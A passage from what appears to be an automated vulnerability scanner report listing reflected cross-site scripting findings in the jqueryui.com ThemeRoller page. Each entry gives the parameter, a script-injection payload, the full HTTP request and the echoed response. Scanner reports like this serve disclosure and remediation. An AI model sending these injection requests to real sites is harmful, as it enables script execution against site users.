opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636922fd"><script>alert(1)</script>bfebabdeafa&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

2.162. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567ab"><script>alert(1)</script>6bb62385672 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121567ab"><script>alert(1)</script>6bb62385672&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121567ab"><script>alert(1)</script>6bb62385672&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

2.163. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3de9"><script>alert(1)</script>10d22a8c27a was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serife3de9"><script>alert(1)</script>10d22a8c27a&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serife3de9"><script>alert(1)</script>10d22a8c27a&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

2.164. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba6c"><script>alert(1)</script>6024da5fef4 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em1ba6c"><script>alert(1)</script>6024da5fef4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em1ba6c"><script>alert(1)</script>6024da5fef4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

2.165. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd94f"><script>alert(1)</script>389a59d3bbf was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaldd94f"><script>alert(1)</script>389a59d3bbf&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normaldd94f"><script>alert(1)</script>389a59d3bbf&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

2.166. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cee7"><script>alert(1)</script>abd743a9c48 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545459cee7"><script>alert(1)</script>abd743a9c48&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545459cee7"><script>alert(1)</script>abd743a9c48&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

2.167. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e87"><script>alert(1)</script>a3ea86a304c was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222287e87"><script>alert(1)</script>a3ea86a304c&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222287e87"><script>alert(1)</script>a3ea86a304c&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

2.168. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc50e"><script>alert(1)</script>3faf1eb1fc7 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888dc50e"><script>alert(1)</script>3faf1eb1fc7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888dc50e"><script>alert(1)</script>3faf1eb1fc7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

2.169. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46104"><script>alert(1)</script>3928c085e5 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a46104"><script>alert(1)</script>3928c085e5&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a46104"><script>alert(1)</script>3928c085e5&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

2.170. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8814c"><script>alert(1)</script>b9661bee4fa was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222228814c"><script>alert(1)</script>b9661bee4fa&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222228814c"><script>alert(1)</script>b9661bee4fa&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

2.171. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef9c"><script>alert(1)</script>ed8429324bf was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

